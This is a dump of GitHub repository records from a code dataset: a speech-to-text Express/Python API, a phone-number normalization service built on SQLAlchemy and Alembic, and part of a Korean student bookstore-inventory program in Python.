repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
BhuwanSingh/Ode_to_Code-
https://github.com/BhuwanSingh/Ode_to_Code-
f719aed02513bf636a558b9d83a4755c6f742bc5
9ba0ef3cdae2897d61b836d93b089ef4030d74cb
605a070abab9095170a2d160feeb59805cac6851
refs/heads/main
2023-06-26T18:38:49.636232
2021-07-29T17:16:59
2021-07-29T17:16:59
374,023,083
0
1
MIT
2021-06-05T04:52:04
2021-06-05T05:47:56
2021-06-05T05:49:18
null
[ { "alpha_fraction": 0.558456301689148, "alphanum_fraction": 0.5629965662956238, "avg_line_length": 23.5, "blob_id": "f67aa2eb7e9d14ac31ba096b188aa00c91076bc0", "content_id": "d33bbd02aec50bc175aaf9a8d1443ef5538ae659", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 881, "license_type": "permissive", "max_line_length": 64, "num_lines": 36, "path": "/index.js", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "const express = require(\"express\");\nconst app = express();\n// const router = express.Router();\nconst fs = require(\"fs\");\nconst PythonShell = require(\"python-shell\").PythonShell;\n\napp.use(express.json());\n\napp.get(\"/api\", (req, res) => {\n console.log(\"here\");\n const a = req.body;\n\n fs.writeFileSync(\"input.json\", JSON.stringify(a), (err) => {\n if (err) {\n console.error(err);\n return;\n }\n });\n\n PythonShell.run(\"main.py\", null, function (err) {\n if (err) throw err;\n console.log(\"finished\");\n var ans = fs.readFileSync(\"output.json\");\n let fans = JSON.parse(ans);\n console.log(\"working-get\");\n res.json({ fans });\n });\n\n});\n\nlet port = process.env.PORT || 3001;\napp.listen(port, () => {\n console.log(`listining on port:${port}`);\n});\n\n// app.use(\"/.netlify/functions/api\" , router);" }, { "alpha_fraction": 0.56561678647995, "alphanum_fraction": 0.5822397470474243, "avg_line_length": 19.972476959228516, "blob_id": "dfdf28fd41b8479661f5d62510bff74142f1d16a", "content_id": "e4832288f8551382a511400f64262b44ff88579d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2286, "license_type": "permissive", "max_line_length": 69, "num_lines": 109, "path": "/main.py", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "import speech_recognition as sr\nimport librosa\nimport json\nimport base64\nimport soundfile as sf\nfrom datetime import datetime\nimport re\n\nimport time\nstart_time = time.time()\n\ninput_data = open(\"input.json\",)\ninput_data_dict = json.load(input_data)\n# to_match = input_data_dict[\"options\"]\nif \"options\" in input_data_dict:\n to_match = input_data_dict[\"options\"]\nelse:\n exit()\n\naudio = input_data_dict[\"audio\"]\nquestion = input_data_dict['question_key']\nwav_file = open(\"temp.wav\", \"wb\")\ndecode_string = base64.b64decode(audio)\nwav_file.write(decode_string)\n\nx, _ = librosa.load('./temp.wav', sr=16000)\nsf.write('tmp.wav', x, 16000)\n# wave.open('tmp.wav','r')\n\nfilename = \"tmp.wav\"\n\na = []\n\nr = sr.Recognizer()\nwith sr.AudioFile(filename) as source:\n # listen for the data (load audio to memory)\n audio_data = r.record(source)\n # recognize (convert from speech to text)\n text = r.recognize_google(audio_data)\n text = text.lower()\n a = list(text.split(\" \"))\n\n\n\n# print(to_match)\n\nb = []\nif question == 'q1':\n for i in to_match:\n if i in a:\n b.append(i)\n k = { \"answers\" : b}\n f = open(\"output.json\", \"w+\")\n # arr = a.split()\n f.write(json.dumps(k))\n f.close()\n\n\n# if question == 'q2':\n# num = int(audio.split(\"lakh\")[0])\n\n# limits = []\n\n# limits.append(int(options[0].split(\"<\")[1].split(\"lakh\")[0]))\n\n\n# for i in range(1,len(options)-1):\n# num = int(audio.split(\"lakh\")[0])\n\n# limits = []\n\n# limits.append(int(options[0].split(\"<\")[1].split(\"lakh\")[0]))\n\n\n# for i in range(1,len(options)-1):\n# check = options[i].split(\"-\")\n# upper = int(check[1].split(\"lakh\")[0])\n# limits.append(int(upper))\n\n# pos=-1\n\n# for i in range(0,len(options)-1):\n# if num <= limits[i]:\n# pos=i\n# break\n\n# if pos is -1:\n# print( options[len(options)-1])\n# else:\n# print(options[pos])\n\n\nif question == 'q3':\n listToStr = ' '.join(map(str, a))\n date_time_obj = datetime.strptime(listToStr, '%d/%m/%y %H:%M:%S')\n # b.append[date_time_obj]\n k = { \"answers\" : date_time_obj}\n f = open(\"output.json\", \"w+\")\n # arr = a.split()\n f.write(json.dumps(k))\n f.close()\n\n\n# print(b)\n\n\n\nprint(a)\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n" }, { "alpha_fraction": 0.7394636273384094, "alphanum_fraction": 0.7720306515693665, "avg_line_length": 53, "blob_id": "4eb57ee2fcf4ad17a9ab9df7f01f1d9aa8a4d7d9", "content_id": "70bc4413361e476335bc9de8d15bac83ef9e385c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1571, "license_type": "permissive", "max_line_length": 267, "num_lines": 29, "path": "/README.md", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "# Ode_to_Code-\n## Team - Simple coders\n\n#### 1.) Leader - Bhuwan Kumar Singh\n#### 2.) Member 1 - Isha Jain\n#### 3.) Member 2 - Mayank Dubey\n\n## 🎤SPEECH-TO-TEXT-API-GENERATOR\nThe Speech to Text service uses google's speech regognition abilities to convert speech into text.The transcription of incoming audio is sent back to the client with minimal delay. The service is accessed via Heroku interface; a REST HTTP interface is also available.\n\n## API GENERATE\nAPI is the acronym for Application Programming Interface, which is a software intermediary that allows two applications to talk to each other. Each time we use an app like Facebook, send an instant message, or check the weather on our phone, we’re using an API.\nWe used INSOMNIA to create,design the API based on index.js,express and used the free hosting abilities of Heroku to generate our API.\n\n# INPUT \nAudio in the form of base64 encoded jason file\n# Output\n![image](https://user-images.githubusercontent.com/63011793/120913767-27901180-c6b7-11eb-95f6-4af41f11ced1.png)\n\n\n## SPEECH RECOGNITION\nFor this purpose we used the python libraries like speech recognition,librosa,json,base64,soundfile etc.This here take your voice in base64 encoding or live audio and converts it into normal string.\n\n## USER INTERFACE\nIt's a basic UI made from html,css and java script\n\n## Corner and edge Cases that are to be avoided-\n1. Directly accessing the API link, which in turn inputs no data in the API. This breaks it and is to be avoided right now.\n2. Trying to process files that do not contain their bitrate causes the API to crash.\n" }, { "alpha_fraction": 0.5692307949066162, "alphanum_fraction": 0.7384615540504456, "avg_line_length": 20.33333396911621, "blob_id": "d9c12f97e8e4e38386d84125f97955947d53205e", "content_id": "64cb256fba01b20f294e47c1bc8175a0f3ac333b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 65, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/requirements.txt", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "librosa==0.8.1\nSoundFile==0.10.3.post1\nSpeechRecognition==3.8.1\n\n" }, { "alpha_fraction": 0.5936577916145325, "alphanum_fraction": 0.6017699241638184, "avg_line_length": 21.983051300048828, "blob_id": "0e0ca731755610aa2e146312bae2563036ca90fe", "content_id": "5bc71ee074d9e007b4c0e0c964bcfa2fbcdc6f10", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1356, "license_type": "permissive", "max_line_length": 60, "num_lines": 59, "path": "/live.py", "repo_name": "BhuwanSingh/Ode_to_Code-", "src_encoding": "UTF-8", "text": "import pyttsx3\nimport speech_recognition as sr\nimport json\nimport base64\n\nimport wavio\n\n\n\n# Initialize the recognizer\nr = sr.Recognizer()\n\n\n# Function to convert text to\n# speech\n\nencode_string = open(\"audio.wav\", \"rb\").read()\nwav_file = open(\"temp.wav\", \"wb\")\ndecode_string = base64.b64decode(encode_string)\nwav_file.write(decode_string)\nfilename='temp.wav'\n\nwavio.write(filename, temp, fs ,sampwidth=2)\n#def SpeakText(command):\n # Initialize the engine\n # engine = pyttsx3.init()\n # engine.say(command)\n # engine.runAndWait()\n\n\n# Loop infinitely for user to\n# speak\n\nwhile(1):\n\n # Exception handling to handle\n # exceptions at the runtime\n try:\n with sr.AudioFile(filename) as source:\n # listen for the data (load audio to memory)\n audio_data = r.record(source)\n # recognize (convert from speech to text)\n text = r.recognize_google(audio_data)\n print(text)\n\n\n text = text.lower()\n f=open(\"output.txt\",\"w+\")\n arr = text.split()\n f.write(json.dumps(arr))\n f.close()\n\n print(\"Did you say \" + text)\n\n except sr.RequestError as e:\n print(\"Could not request results; {0}\".format(e))\n\n except sr.UnknownValueError:\n print(\"unknown error occured\")\n" } ]
5
ivan-shishkov/29_phones
https://github.com/ivan-shishkov/29_phones
3b22b48aded70f29e77667cd0d9595c361541f15
56e2c3a15710585203bc7de38258ec9eabe71488
fdfe3045a2f9e6b5cc4514fdd63dd657d5b4a3d6
refs/heads/master
2020-04-10T10:40:39.399479
2018-12-26T20:57:10
2018-12-26T20:57:10
160,972,938
0
0
null
2018-12-08T19:45:07
2016-12-25T21:05:41
2016-12-30T09:23:07
null
[ { "alpha_fraction": 0.4931506812572479, "alphanum_fraction": 0.7123287916183472, "avg_line_length": 17.25, "blob_id": "5e84f812bc3e8c452122b58c43105295427f016e", "content_id": "44ef65c87bd1d9c73710da991020392ecdda0730", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 73, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/requirements.txt", "repo_name": "ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "alembic==1.0.5\nphonenumbers==8.10.2\npsycopg2==2.7.6.1\nSQLAlchemy==1.2.14\n" }, { "alpha_fraction": 0.7714502811431885, "alphanum_fraction": 0.7737281918525696, "avg_line_length": 27.021276473999023, "blob_id": "26cf9680e9bfc1fd1e03518a064a0e8b02ba0c98", "content_id": "3a7f03ff23253c5ef33be297fb058bce4d02cb8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1317, "license_type": "no_license", "max_line_length": 158, "num_lines": 47, "path": "/README.md", "repo_name": "ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "# Microservice for Search Index of Phone Numbers\n\nThis service allows you to normalize the phone numbers in the table with orders info for the online store database.\nThis will make it convenient and quick to search for orders by phone number.\n\n# Quickstart\n\nFor service launch need to install Python 3.5 and then install all dependencies:\n\n```bash\n\n$ pip install -r requirements.txt\n\n```\n\n## Used Environment Variables\n\n* **DATABASE_URI** - a database URI\n\n## Adding a New Column to a Database Table\n\nTo perform this operation, you must have access to the database with permissions to change the structure of the tables.\n\nTo add a new column in which phone numbers will be stored in a normalized form, you need to run:\n\n```bash\n\n$ export DATABASE_URI='postgresql://username:password@db_host/db_name'\n$ alembic upgrade head\n\n```\n\n## Running of Phone Numbers Normalization Script in Background\n\nTo run the phone numbers normalization script in background need to execute:\n\n```bash\n\n$ nohup python3 normalize_phones.py &\n\n```\n\nAfter that, the script will periodically check the appearance of orders with unnormalized telephone numbers in the background and perform their normalization.\n\n# Project Goals\n\nThe code is written for educational purposes. Training course for web-developers - [DEVMAN.org](https://devman.org)\n" }, { "alpha_fraction": 0.7389635443687439, "alphanum_fraction": 0.7504798173904419, "avg_line_length": 26.421052932739258, "blob_id": "91b69de34f26f42203063df99d11c05b0de44579", "content_id": "67a1e478f1e205775fc3d524dabb2f211f7d2b7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/db.py", "repo_name": "ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "import os\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy import create_engine, Column, Integer, String\n\nBase = declarative_base()\n\nengine = create_engine(os.environ.get('DATABASE_URI'))\n\ndb_session = scoped_session(sessionmaker(bind=engine))\n\n\nclass Order(Base):\n __tablename__ = 'orders'\n\n id = Column(Integer, primary_key=True)\n contact_phone = Column(String(100))\n contact_phone_normalized = Column(String(100), index=True)\n" }, { "alpha_fraction": 0.6264526844024658, "alphanum_fraction": 0.6319867372512817, "avg_line_length": 24.45070457458496, "blob_id": "7900afe56bd272dd62905ffbda3824074fc760de", "content_id": "7c99ac0bbce3e9a43c5ddfe25544103e238f950c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1807, "license_type": "no_license", "max_line_length": 75, "num_lines": 71, "path": "/normalize_phones.py", "repo_name": "ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "import time\nimport re\n\nfrom sqlalchemy.exc import OperationalError\nimport phonenumbers\nfrom phonenumbers.phonenumberutil import NumberParseException\n\nfrom db import db_session, Order\n\nTIMEOUT_BETWEEN_PHONES_NORMALIZATION_CYCLES = 5 * 60\nTIMEOUT_WHEN_ERROR = 10\nTIMEOUT_BETWEEN_TRANSACTIONS = 5\n\n\ndef get_normalized_phone_number(source_phone_number, region='RU'):\n if source_phone_number is None:\n return ''\n\n cleared_phone_number = ''.join(re.findall(r'\\d+', source_phone_number))\n\n if cleared_phone_number.startswith('8'):\n cleared_phone_number = '{}{}'.format(\n phonenumbers.country_code_for_valid_region(region),\n cleared_phone_number,\n )\n try:\n return str(\n phonenumbers.parse(\n cleared_phone_number,\n region,\n ).national_number,\n )\n except NumberParseException:\n return ''\n\n\ndef normalize_contact_phones(orders):\n for order in orders:\n order.contact_phone_normalized = get_normalized_phone_number(\n order.contact_phone,\n )\n db_session.commit()\n\n\ndef run_phones_normalization_cycle(count_rows_per_transaction=100):\n while True:\n orders = db_session.query(Order).filter(\n Order.contact_phone_normalized.is_(None),\n ).limit(count_rows_per_transaction).all()\n\n if not orders:\n break\n\n normalize_contact_phones(orders)\n\n time.sleep(TIMEOUT_BETWEEN_TRANSACTIONS)\n\n\ndef main():\n while True:\n try:\n run_phones_normalization_cycle()\n except OperationalError:\n db_session.rollback()\n time.sleep(TIMEOUT_WHEN_ERROR)\n continue\n time.sleep(TIMEOUT_BETWEEN_PHONES_NORMALIZATION_CYCLES)\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.5936395525932312, "alphanum_fraction": 0.6378092169761658, "avg_line_length": 17.25806427001953, "blob_id": "3d2b85dc90e8efe3978bf84b3ba4ca1bf719928e", "content_id": "1cab4633a97112245d28c350a08399a2879105af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 566, "license_type": "no_license", "max_line_length": 56, "num_lines": 31, "path": "/alembic/versions/ece6c9ebeb97_add_normalized_contact_phone_column.py", "repo_name": "ivan-shishkov/29_phones", "src_encoding": "UTF-8", "text": "\"\"\"add normalized contact phone column\n\nRevision ID: ece6c9ebeb97\nRevises: \nCreate Date: 2018-12-09 21:46:17.286164\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ece6c9ebeb97'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\n 'orders',\n sa.Column(\n 'contact_phone_normalized',\n sa.String(length=100),\n index=True,\n ),\n )\n\n\ndef downgrade():\n op.drop_column('orders', 'contact_phone_normalized')\n" } ]
5
miguxbe/FaaS
https://github.com/miguxbe/FaaS
e53522b73c3629f4ae9540a087aadf9875e25483
fbfe6aa21aef7482652f613bedd8dd8ec4c0504a
75390f6c219fe6d86afb72d3d3a491fed967905c
refs/heads/master
2021-01-19T18:10:24.462014
2014-07-14T17:45:59
2014-07-14T17:45:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7475728392601013, "alphanum_fraction": 0.7475728392601013, "avg_line_length": 16.33333396911621, "blob_id": "e265569a9e05ec12a34781b51f8c76581d7951b4", "content_id": "6ddcbd3c47040c4a48d1e778b9580db13fc3e541", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 103, "license_type": "no_license", "max_line_length": 47, "num_lines": 6, "path": "/readme.md", "repo_name": "miguxbe/FaaS", "src_encoding": "UTF-8", "text": "Fortunes as a Service (FaaS)\n===\n\nA simple but useful REST service. Just for fun.\n\nStill in development" }, { "alpha_fraction": 0.6188162565231323, "alphanum_fraction": 0.625, "avg_line_length": 25.647058486938477, "blob_id": "f7d58e2bd1a1e660f05fdf40029c4bdf5caedb2f", "content_id": "d07dcc35de48d9b527154c501160b917f5fd3ca5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2264, "license_type": "no_license", "max_line_length": 81, "num_lines": 85, "path": "/app.py", "repo_name": "miguxbe/FaaS", "src_encoding": "UTF-8", "text": "#!flask/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n Fortunes as a Service (faas)\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n A simple but useful REST service. Just for fun.\n \n\"\"\"\n\nimport os\nfrom flask import Flask, jsonify, g\nimport json\nimport sqlite3 as q\nimport random\n\napp = Flask(__name__)\n\n# Load default config and override config from an environment variable\napp.config.update(dict(\n DATABASE = os.path.join(app.root_path,'fortunes.db'),\n DEBUG = True\n))\napp.config.from_envvar('FAAS_SETTINGS', silent = True)\n\ndef connect_db():\n \"\"\"Connects to the databse\"\"\"\n con = q.connect(app.config['DATABASE'])\n con.row_factory = q.Row\n return con\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\[email protected]_appcontext\ndef close_db(error):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n# Retive all fortunes stored in the DDBB\[email protected]('/fortunes/api/v1.0/all', methods = ['GET'])\ndef get_all():\n db = get_db()\n cur = db.execute('select * from fortunes order by id asc')\n recs = cur.fetchall()\n rows = [ dict(rec) for rec in recs] \n rows_json = json.dumps(rows, sort_keys=True, indent=4, separators=(',',': '))\n #print rows_json\n return rows_json\n\n# Just retive a fortune\[email protected]('/fortunes/api/v1.0/<int:fortune_id>', methods = ['GET'])\ndef get_by_id(fortune_id):\n # respone = filter(lambda t: t['id'] == fortune_id, fortunes)\n db = get_db()\n cur = db.execute(\"select * from fortunes where id = '%i'\" % fortune_id)\n res = cur.fetchall()\n return jsonify({'fortunes': res})\n\[email protected]('/fortunes/api/v1.0/rand')\ndef get_rand():\n db = get_db()\n cur = db.execute('select * from fortunes')\n count = cur.rowcount\n rand_id = random.randrange(0,count)\n return jsonify({'fortunes': fortunes[rand_id]})\n\[email protected]('/fortunes/api/v1.0/count')\ndef get_count():\n db = get_db()\n cur = db.execute('select conunt(*) from fortunes')\n\n# @app.route('/gulfort/api/v1.0/count')\n# def get_count():\n\n\nif __name__ == '__main__':\n app.run(debug = True)" } ]
2
cw02048/python-numpy-pandas
https://github.com/cw02048/python-numpy-pandas
afa4814051de095c73e64e91facdb418b59bece6
e01f833e2b3ffe140bc61031535b44529f6f8c01
eb94082c7e69da04d068f253afac7e33927aa48c
refs/heads/master
2020-07-29T11:21:12.005661
2019-12-15T07:12:36
2019-12-15T07:12:36
209,779,746
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6477272510528564, "alphanum_fraction": 0.6704545617103577, "avg_line_length": 16.600000381469727, "blob_id": "438c9f650a6581c6de3b5407dbce133612eca48d", "content_id": "3065d7baaaa93ee0800d991a8290597c076ae3cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 764, "license_type": "no_license", "max_line_length": 49, "num_lines": 20, "path": "/README.md", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# Python (NumPy & Pandas) Study\n파이썬 과제\n\n첫 번째 과제: 받은 정수의 진수를 변경\n\n두 번째 과제: 프로그램은 다음과 같은 기능을 사용자에게 제공하여야 함\n\n입력기능\n1. 서점의 재고는 파일에 저장되어 있으며, 이 파일의 데이터를 입력 받아 프로그램 종작\n\n사용자 서비스 기능\n1. 재고의 데이터를 저자의 이름 순으로 정렬하여 출력\n2. 특정 작가의 작품을 제목 순으로 출력\n3. 새로운 서적 정보 입력\n4. 특정 서적의 가격 정보 변경\n5. 특정 서적의 재고 숫자 변경\n6. 재고에 있는 전체 서적의 재고 숫자 출력\n7. 재고에 있는 서적들에 대한 전체 가격 출력\n\n세 번째 과제: 이미지 필터링\n" }, { "alpha_fraction": 0.5150273442268372, "alphanum_fraction": 0.5226986408233643, "avg_line_length": 28.19325065612793, "blob_id": "3b1a73ecf52bb1742748221fe1d74451a43ad436", "content_id": "65f82b61c0b5742dbdcd7b7ca989b90de6f394a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11382, "license_type": "no_license", "max_line_length": 152, "num_lines": 326, "path": "/assignment2/assignment2.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 24 13:57:46 2019\n\n@author: cw020\n\"\"\"\n\nimport os\n\n#프로그램 실행 시 인사 출력 함수\ndef greeting() :\n \n print('welcome to the bookstore program!')\n \n return\n\n# 입력한 이름의 파일이 경로에 있는지 확인해주고, 파일을 읽어서 딕셔너리에 저장해주는 함수\ndef readDatabase(theInventory) :\n \n # 올바른 파일명을 입력할 때까지 반복\n while True :\n \n fileName = input('Enter the name of the file: ')\n \n # 경로에 존재하는 파일명을 입력할 때까지 반복 \n if os.path.isfile(fileName) == True :\n break\n \n else :\n print('Error reading database')\n \n # 파일을 읽어서 딕셔너리에 저장\n parsingDatabase(fileName, theInventory)\n \n return\n \n# 파일을 읽어서 딕셔너리에 저장하는 함수\ndef parsingDatabase(fileName, theInventory):\n \n file = open(fileName)\n \n # 파일의 끝까지 한 줄씩 읽어서 저장\n while True: \n \n line = file.readline() # 한 줄씩 읽고,\n line = line.rstrip('\\n') # 줄바꿈 문자 제거\n \n # 파일의 끝이면 파일을 닫고 함수 종료\n if line == '' :\n file.close() \n return\n \n else :\n # ,로 구별하여 리스트에 저장\n line = line.split(',')\n \n # 만약 이미 존재하는 저자명이면 리스트에 합쳐줌\n if line[0] + ', ' + line[1] in theInventory :\n theInventory[line[0] + ', ' + line[1]].append([line[2], line[3], line[4]]) \n \n # 만약 새로 들어가는 저자명이면 새로 저장해줌\n else:\n theInventory.update({line[0] + ', ' + line[1]: [[line[2], line[3], line[4]]]})\n \n# 사용자 메뉴를 출력해주는 함수, 입력한 choice를 리턴함\ndef printMenu() :\n \n print('\\n---------------------------------')\n print('Enter 1 to display the inventory')\n print('Enter 2 to display the books by one author')\n print('Enter 3 to add a book')\n print('Enter 4 to change the price')\n print('Enter 5 to change the qty on hand')\n print('Enter 6 to view the total number of books in the inventory')\n print('Enter 7 to see the total amount of the entire inventory')\n print('Enter 8 to exit')\n choice = input('Enter your choice: ')\n \n return choice\n\n# 딕셔너리의 전체 정보를 출력해주는 함수\ndef displayInventory(theInventory) :\n \n # 저자를 이름 순으로 정렬\n for (author, book) in sorted(theInventory.items()): \n print('The author is: ' + author)\n \n # 책의 제목 순으로 정렬하여 출력\n for [title, qty, price] in sorted(book): \n print('\\n The title is: ' + title + '\\n The qty is: ' + qty + '\\n The price is: ' + price + '\\n\\n ----')\n \n return\n\n# 원하는 저자의 책 정보를 출력해주는 함수\ndef displayAuthorsWork(theInventory) :\n \n # 이름의 앞글자들만 대문자로 바꿔줌\n firstName = input('Enter the author\\'s first name: ').lower().title()\n lastName = input('Enter the author\\'s last name: ').lower().title()\n \n # 저자의 입력 형식을 맞춰줌\n author = lastName + ', ' + firstName\n \n # 딕셔너리에 저자가 없을 때\n if (author in theInventory) == False: \n print('Sorry, but no books by ' + author + ' in the inventory') \n return\n \n # 딕셔너리에 저자가 있으면 책의 제목 순으로 출력\n else: \n for [title, qty, price] in sorted(theInventory[author]): \n print(' The title is: ' + title + '\\n The qty is: ' + qty + '\\n The price is: ' + price + '\\n\\n ----') \n \n return\n\n# 딕셔너리에 책을 추가하는 함수\ndef addBook(theInventory) :\n \n # 이름의 앞글자들만 대문자로 바꿔줌\n firstName = input('Enter the author\\'s first name: ').lower().title()\n lastName = input('Enter the author\\'s last name: ').lower().title() \n title = input('Enter the title: ').lower().title()\n \n # 저자의 입력 형식을 맞춰줌\n author = lastName + ', ' + firstName\n \n # 이미 책이 존재할 때 메세지 출력\n if checkExisting(author, title, theInventory).isdigit(): \n print('This book is already in the Inventory and cannot be added again')\n \n # 저자만 존재할 때는 책 정보를 입력받아서 출력\n elif checkExisting(author, title, theInventory) == 'existing author': \n qty = inputQty()\n price = inputPrice()\n theInventory[author].append([title, qty, price])\n \n # 저자가 존재하지 않으면 딕셔너리에 새로운 키과 값을 생성\n else: \n qty = inputQty()\n price = inputPrice()\n theInventory.update({author: [[title, qty, price]]})\n \n return\n\n# 입력받은 저자와 책 제목이 존재하는지 판별하는 함수\ndef checkExisting(author, title, theInventory):\n \n # 저자가 존재하는지 확인\n if author in theInventory: \n cnt = 0\n \n # 책이 존재하는지 확인\n for i in theInventory[author]:\n \n # 책이 존재한다면 몇 번째 리스트에 존재하는지 리턴\n if title in i: \n return str(cnt)\n cnt += 1\n return 'existing author' # 저자만 존재할 때 출력\n \n # 저자가 존재하지 않을 때\n else:\n return 'no author'\n\n# 올바른 재고 값을 입력받는 함수\ndef inputQty():\n \n # 올바른 재고 값을 입력할 때까지 반복\n while True: \n qty = input('Enter the qty: ')\n \n # 숫자인지 확인\n if(qty.isdigit() == True):\n qty = float(qty)\n \n # 양의 정수인지 확인\n if (qty % 1 == 0 and qty > 0):\n return str(int(qty))\n \n # 잘못된 입력일 경우\n print('Invalid input for qty.')\n\n# 올바른 책의 가격을 입력받는 함수\ndef inputPrice():\n \n # 올바른 가격을 입력할 때까지 반복\n while True: \n price = input('Enter the price: ')\n \n # 양의 실수만 받음\n if(len(price) == 4 and price[1] == '.' and price.replace('.', '', 1).isdigit() == True): \n \n if 0.00 < float(price) <= 9.99: \n return str(price)\n \n # 잘못된 입력일 경우\n print('Invalid input for price.')\n \n return\n\n# 책의 가격을 변경해주는 함수\ndef changePrice(theInventory) :\n \n # 이름의 앞글자들만 대문자로 바꿔줌\n firstName = input('Enter the author\\'s first name: ').lower().title()\n lastName = input('Enter the author\\'s last name: ').lower().title() \n # 저자의 입력 형식을 맞춰줌\n author = lastName + ', ' + firstName\n \n # 만약 저자가 존재하면\n if author in theInventory:\n title = input('Enter the title: ').lower().title()\n \n # 만약 존재하는 책이면\n if checkExisting(author, title, theInventory).isdigit():\n price = inputPrice() # 바꿀 값을 입력\n print('Price will be updated from ' + theInventory[author][int(checkExisting(author, title, theInventory))][2] + ' to ' + price)\n # 입력받은 값으로 변경\n theInventory[author][int(checkExisting(author, title, theInventory))][2] = price \n \n # 저자는 있고 책이 없을 때\n else:\n print('No book with the title ' + title + ' by ' + author + ' in inventory.')\n # 저자가 없을 때\n else:\n print('No such author in your database. So you cannot change the price')\n \n return\n\n# 책의 재고를 변경해주는 함수\ndef changeQty(theInventory) :\n \n # 이름의 앞글자들만 대문자로 바꿔줌\n firstName = input('Enter the author\\'s first name: ').lower().title()\n lastName = input('Enter the author\\'s last name: ').lower().title() \n # 저자의 입력 형식을 맞춰줌\n author = lastName + ', ' + firstName\n \n # 만약 저자가 존재하면\n if author in theInventory:\n title = input('Enter the title: ').lower().title()\n \n # 만약 존재하는 책이면\n if checkExisting(author, title, theInventory).isdigit():\n qty = inputQty() # 바꿀 값을 입력\n print('Qty will be updated from ' + theInventory[author][int(checkExisting(author, title, theInventory))][1] + ' to ' + qty)\n # 입력받은 값으로 변경\n theInventory[author][int(checkExisting(author, title, theInventory))][1] = qty \n \n # 저자는 있고 책이 없을 때 \n else:\n print('No book with the title ' + title + ' by ' + author + ' in inventory.')\n # 저자가 없을 때\n else:\n print('No such author in your database. So you cannot change the qty')\n \n return\n\n# 책의 재고의 총합을 계산해주는 함수\ndef totalQty(theInventory) :\n \n total = 0 # 재고를 저장할 변수\n \n # 모든 저자들을 반복\n for author in list(theInventory.keys()): \n \n # 각 책의 재고 값을 꺼내고 부동소수점 때문에 소수 2번째자리까지 반올림해서 더해줌\n for book in theInventory[author]:\n total = round(total + int(book[1]), 2)\n \n # 결과 값 출력\n print('The total number of books is ' + str(total))\n \n return\n\n# 책의 가격의 총합을 계산해주는 함수\ndef calculateTotalAmount(theInventory) :\n \n total = 0.00 # 가격을 저장할 변수\n \n # 모든 저자들을 반복\n for author in list(theInventory.keys()):\n \n # 각 책의 재고 값과 가격을 곱해서 tatal에 더해줌 (부동소수점 때문에 소수 2번째자리까지 반올림해서 더해줌)\n for book in theInventory[author]:\n total = round(total + int(book[1]) * float(book[2]), 2)\n \n # 결과 값 출력\n print('The total value of the inventory is $' + str(total))\n \n return\n\n# 메인문\ndef main() :\n \n theInventory = {}\n greeting()\n readDatabase(theInventory)\n \n while True: \n \n choice = printMenu()\n \n if choice == '1':\n displayInventory(theInventory)\n elif choice == '2':\n displayAuthorsWork(theInventory)\n elif choice == '3':\n addBook(theInventory)\n elif choice == '4':\n 